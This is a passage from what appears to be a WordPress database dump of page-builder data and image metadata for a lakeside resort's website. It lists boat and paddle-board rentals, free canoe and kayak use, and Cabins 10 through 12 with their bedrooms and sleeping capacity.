Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48d8414\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c530bfd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6edda1c\"}]},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">16 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"80347fe\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02046c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1893353\"}]},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b555a73\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ecce2ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"097b1aa\"}]},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9de916f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f334c4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"75e0743\"}]},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11b94d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da4d017\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"abd79ac\"}]},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbc097a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6c8184f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2ed5a11\"}]},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a28b037\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63eca3b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13e791a\"}]},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">RENT A PADDLE BOARD<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ccf64d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ce0da8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db765d1\"}]},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"71b87fc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c7ff68d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d88c0cd\"}]},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4802a00\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94bd481\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d562f41\"}]},\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"65bbf44\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c90a3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d726c85\"}]},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2069,780,'_elementor_version','2.5.12'),(2070,780,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2081,781,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.38.01-PM.png'),(2082,781,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:319;s:6:\"height\";i:241;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.38.01-PM.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.01-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.01-PM-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.01-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.01-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2083,782,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.38.10-PM.png'),(2084,782,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:320;s:6:\"height\";i:243;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.38.10-PM.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.10-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.10-PM-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.10-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.10-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2085,783,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.38.17-PM.png'),(2086,783,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:291;s:6:\"height\";i:221;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.38.17-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.17-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.17-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.38.17-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2165,789,'vantage_panels_no_legacy','true'),(2166,789,'_edit_lock','1567030706:3'),(2167,789,'_edit_last','1'),(2168,789,'_elementor_edit_mode','builder'),(2169,789,'_elementor_template_type','post'),(2170,789,'_elementor_version','2.6.8'),(2171,790,'vantage_panels_no_legacy','true'),(2172,790,'_menu_item_type','post_type'),(2173,790,'_menu_item_menu_item_parent','38'),(2174,790,'_menu_item_object_id','789'),(2175,790,'_menu_item_object','page'),(2176,790,'_menu_item_target',''),(2177,790,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2178,790,'_menu_item_xfn',''),(2179,790,'_menu_item_url',''),(2180,791,'_elementor_edit_mode','builder'),(2181,791,'_elementor_template_type','post'),(2182,791,'_elementor_version','2.5.12'),(2183,789,'_wp_page_template','default'),(2185,789,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>We are now taking reservations for next summer !!<\\/h2><p><strong>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/span><\\/strong><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2186,792,'_elementor_edit_mode','builder'),(2187,792,'_elementor_template_type','post'),(2188,792,'_elementor_version','2.5.12'),(2189,792,'_wp_page_template','default'),(2190,792,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s